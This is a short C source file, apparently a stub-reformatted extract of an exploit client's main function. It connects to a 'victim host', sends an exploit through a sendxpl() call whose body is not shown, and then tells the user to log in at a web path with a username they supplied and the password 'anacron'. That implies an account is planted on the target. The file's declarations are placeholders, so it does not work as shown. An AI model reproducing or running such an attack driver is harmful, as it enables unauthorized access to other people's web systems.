
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_port; int sin_family; int sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {int h_length; int h_addr; } ;
typedef int addr ;


 int AF_INET ;
 int PORT ;
 int SOCK_STREAM ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int errgeth () ;
 int errsock () ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int info () ;
 int memcpy (char*,int ,int ) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int printf (char*,...) ;
 int sendxpl (int,char**) ;
 int shutdown (int,int) ;
 int socket (int ,int ,int ) ;
 int system (char*) ;

int main(int argc, char *argv[]){

int sock, sockconn;
struct sockaddr_in addr;
struct hostent *hp;

if(argc!=4)
  info();

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  errsock();

system("clear");
printf("[*] Creating socket             [OK]\n");

if((hp = gethostbyname(argv[1])) == ((void*)0))
  errgeth();

printf("[*] Resolving victim host       [OK]\n");

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
  errsock();

printf("[*] Connecting at victim host   [OK]\n");

sendxpl(sock, argv);

printf("[*] Now check on\n"
      "    http://%s%s\n\n"
      "    your username: %s\n"
      "    with password: anacron\n\n",argv[1],argv[2],argv[3]);

shutdown(sock, 2);
close(sock);

return(0);

}
